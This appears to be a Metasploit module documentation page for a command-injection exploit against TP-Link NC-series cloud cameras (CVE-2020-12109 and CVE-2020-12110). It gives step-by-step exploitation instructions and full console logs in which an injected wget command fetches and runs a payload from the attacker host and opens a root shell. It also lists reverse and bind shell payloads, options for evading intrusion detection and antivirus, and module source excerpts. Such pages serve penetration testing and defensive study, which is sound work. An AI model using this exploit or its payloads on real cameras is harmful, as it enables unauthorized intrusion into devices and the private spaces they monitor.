TP-Link Cloud Cameras NCXXX Bonjour Command Injection - Metasploit


This page contains detailed information about how to use the exploit/linux/http/tp_link_ncxxx_bonjour_command_injection metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: TP-Link Cloud Cameras NCXXX Bonjour Command Injection
Module: exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
Source code: modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
Disclosure date: 2020-04-29
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): mipsle
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-12109, CVE-2020-12110

TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, NC250, NC260, NC450) are vulnerable to an authenticated command injection. In all devices except NC210, despite a check on the name length in swSystemSetProductAliasCheck, no other checks are in place in order to prevent shell metacharacters from being introduced. The system name would then be used in swBonjourStartHTTP as part of a shell command where arbitrary commands could be injected and executed as root. NC210 devices cannot be exploited directly via /setsysname.cgi due to proper input validation. NC210 devices are still vulnerable since swBonjourStartHTTP did not perform any validation when reading the alias name from the configuration file. The configuration file can be written, and code execution can be achieved by combining this issue with CVE-2020-12110.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
msf exploit(tp_link_ncxxx_bonjour_command_injection) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, NC250, NC260, NC450) are vulnerable to an authenticated command injection. In all devices except NC210, despite a check on the name length in swSystemSetProductAliasCheck, no other checks are in place in order to prevent shell metacharacters from being introduced. The system name would then be used in swBonjourStartHTTP as part of a shell command where arbitrary commands could be injected and executed as root. NC210 devices cannot be exploited directly via /setsysname.cgi due to proper input validation. NC210 devices are still vulnerable since swBonjourStartHTTP did not perform any validation when reading the alias name from the configuration file. The configuration file can be written, and code execution can be achieved by combining this issue with CVE-2020-12110. This module will therefore support the following TP-Link cameras:

-NC200 <= 2.1.9 build 200225

-NC220 <= 1.3.0 build 200304

-NC230 <= 1.3.0 build 200304

-NC250 <= 1.3.0 build 200304

-NC260 <= 1.5.2 build 200304

-NC450 <= 1.5.3 build 200304

Verification Steps


-Turn your camera on and make sure you can connect to its web interface.

-Take note of the camera model, ip address, web interface port and credentials.

-Once that is done, open msfconsole and execute the following commands:

  1. use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
  2. set rhost [camera ip]
  3. set rport [camera web interface port, e.g. 80 or 443]
  4. set target [ 0 for NC200, NC220, NC230, NC250 | 1 for NC260, NC450]
  5. set username [web interface username]
  6. set password [corresponding password]
  7. set payload [payload of choice, e.g. linux/mipsle/shell/reverse_tcp]
  8. set lhost [host ip where our reverse shell is listening]
  9. set lport [port to listen for incoming shell]
  10. exploit

You should get a shell.

Options


USERNAME

The web interface username

PASSWORD

The web interface password for the specified username

Scenarios


Target = 0 (TP-Link NC200, NC220, NC230, NC250)

msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80
rport => 80
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0
target => 0
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
username => admin
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
password => password
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
lhost => 192.168.0.254
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
lport => 5555
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit

[*] Started reverse TCP handler on 192.168.0.254:6666 
[*] Authenticating with admin:YWRtaW4= ...
[+] Logged-in as admin
[+] Got cookie: t46af69kmher6f9
[+] Got token: g3cgt74qi0li8rd
[*] Using URL: http://0.0.0.0:8080/UzN4UMl7PF9
[*] Local IP: http://10.0.2.15:8080/UzN4UMl7PF9
[*] Executing command: wget -qO /tmp/jxVywWSo http://192.168.0.254:8080/UzN4UMl7PF9;chmod +x /tmp/jxVywWSo;/tmp/jxVywWSo;rm -f /tmp/jxVywWSo
[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
[*] Sending payload to 192.168.0.1 (Wget)
[*] Sending stage (84 bytes) to 192.168.0.1
[*] Command shell session 3 opened (192.168.0.254:6666 -> 192.168.0.1:60141) at 2020-09-16 18:58:02 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

Target = 1 (TP-Link NC260, NC450)

msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443
rport => 443
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1
target => 1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
username => admin
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
password => password
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
lhost => 192.168.0.254
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
lport => 5555
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit

[*] Started reverse TCP handler on 192.168.0.254:5555 
[*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ...
[+] Logged-in as admin
[+] Got cookie: s8ee6m830juadua
[+] Got token: kad9grok1ap37li
[*] Using URL: http://0.0.0.0:8080/Le4r7p9x
[*] Local IP: http://10.0.2.15:8080/Le4r7p9x
[*] Executing command: wget -qO /tmp/MzczOZUl http://192.168.0.254:8080/Le4r7p9x;chmod +x /tmp/MzczOZUl;/tmp/MzczOZUl;rm -f /tmp/MzczOZUl
[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
[*] Sending stage (84 bytes) to 192.168.0.1
[*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Server stopped.

References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109

https://nvd.nist.gov/vuln/detail/CVE-2020-12109

https://seclists.org/fulldisclosure/2020/May/2

Go back to menu.

Msfconsole Usage


Here is how the linux/http/tp_link_ncxxx_bonjour_command_injection exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection

[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show info

       Name: TP-Link Cloud Cameras NCXXX Bonjour Command Injection
     Module: exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
   Platform: Linux
       Arch: mipsle
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-04-29

Provided by:
  Pietro Oliva <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   TP-Link NC200, NC220, NC230, NC250
  1   TP-Link NC260, NC450

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  admin            yes       The web interface password for the specified username
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     80               yes       The target port (TCP)
  SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT   8080             yes       The local port to listen on.
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                    no        The URI to use for this exploit (default is random)
  USERNAME  admin            yes       The web interface username
  VHOST                      no        HTTP server virtual host

Payload information:

Description:
  TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230, 
  NC250, NC260, NC450) are vulnerable to an authenticated command 
  injection. In all devices except NC210, despite a check on the name 
  length in swSystemSetProductAliasCheck, no other checks are in place 
  in order to prevent shell metacharacters from being introduced. The 
  system name would then be used in swBonjourStartHTTP as part of a 
  shell command where arbitrary commands could be injected and 
  executed as root. NC210 devices cannot be exploited directly via 
  /setsysname.cgi due to proper input validation. NC210 devices are 
  still vulnerable since swBonjourStartHTTP did not perform any 
  validation when reading the alias name from the configuration file. 
  The configuration file can be written, and code execution can be 
  achieved by combining this issue with CVE-2020-12110.

References:
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109
  https://nvd.nist.gov/vuln/detail/CVE-2020-12109
  https://seclists.org/fulldisclosure/2020/May/2
  https://nvd.nist.gov/vuln/detail/CVE-2020-12109

Module Options


This is a complete list of options available in the linux/http/tp_link_ncxxx_bonjour_command_injection exploit:

msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show options

Module options (exploit/linux/http/tp_link_ncxxx_bonjour_command_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            yes       The web interface password for the specified username
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     80               yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       The web interface username
   VHOST                      no        HTTP server virtual host

Payload options (linux/mipsle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   TP-Link NC200, NC220, NC230, NC250

Advanced Options


Here is a complete list of advanced options supported by the linux/http/tp_link_ncxxx_bonjour_command_injection exploit:

msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show advanced

Module advanced options (exploit/linux/http/tp_link_ncxxx_bonjour_command_injection):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, wget)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsle/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/tp_link_ncxxx_bonjour_command_injection module can exploit:

msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   TP-Link NC200, NC220, NC230, NC250
   1   TP-Link NC260, NC450

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/tp_link_ncxxx_bonjour_command_injection exploit:

msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show payloads

Compatible Payloads
===================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsle/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsle/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsle/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsle/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/tp_link_ncxxx_bonjour_command_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

/login.fcgi did not reply correctly. Wrong target ip?


Here is a relevant code snippet related to the "/login.fcgi did not reply correctly. Wrong target ip?" error message:

86:	          'Username' => user,
87:	          'Password' => pass
88:	        }
89:	      })
90:	      if res.nil? || res.code == 404
91:	        fail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?')
92:	      end
93:	      if res.body =~ /"errorCode":0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/
94:	        print_good("Logged-in as #{user}")
95:	        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
96:	        print_good("Got cookie: #{@cookie}")

errorCode


Here is a relevant code snippet related to the "errorCode" error message:

88:	        }
89:	      })
90:	      if res.nil? || res.code == 404
91:	        fail_with(Failure::NoAccess, '/login.fcgi did not reply correctly. Wrong target ip?')
92:	      end
93:	      if res.body =~ /"errorCode":0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/
94:	        print_good("Logged-in as #{user}")
95:	        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
96:	        print_good("Got cookie: #{@cookie}")
97:	        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]
98:	        print_good("Got token: #{@token}")

Login failed with <USER>:<PASS>


Here is a relevant code snippet related to the "Login failed with <USER>:<PASS>" error message:

95:	        @cookie = res.get_cookies.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1]
96:	        print_good("Got cookie: #{@cookie}")
97:	        @token = res.body.scan(/"(token)":"([^,"]*)"/)[0][1]
98:	        print_good("Got token: #{@token}")
99:	      else
100:	        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
101:	      end
102:	    rescue ::Rex::ConnectionError
103:	      fail_with(Failure::Unreachable, 'Connection failed')
104:	    end
105:	  end

Connection failed


Here is a relevant code snippet related to the "Connection failed" error message:

98:	        print_good("Got token: #{@token}")
99:	      else
100:	        fail_with(Failure::NoAccess, "Login failed with #{user}:#{pass}")
101:	      end
102:	    rescue ::Rex::ConnectionError
103:	      fail_with(Failure::Unreachable, 'Connection failed')
104:	    end
105:	  end
106:	
107:	  def enable_bonjour
108:	    res = send_request_cgi({

Failed connection to the web server at <RHOST>:<RPORT>


Here is a relevant code snippet related to the "Failed connection to the web server at <RHOST>:<RPORT>" error message:

115:	        'token' => @token.to_s
116:	      }
117:	    })
118:	    return res
119:	  rescue ::Rex::ConnectionError
120:	    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
121:	    return nil
122:	  end
123:	
124:	  def sys_name(cmd)
125:	    res = send_request_cgi({

Failed connection to the web server at <RHOST>:<RPORT>


Here is a relevant code snippet related to the "Failed connection to the web server at <RHOST>:<RPORT>" error message:

132:	        'token' => @token.to_s
133:	      }
134:	    })
135:	    return res
136:	  rescue ::Rex::ConnectionError
137:	    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
138:	    return nil
139:	  end
140:	
141:	  def execute_command(cmd, _opts = {})
142:	    print_status("Executing command: #{cmd}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Pietro Oliva <pietroliva[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.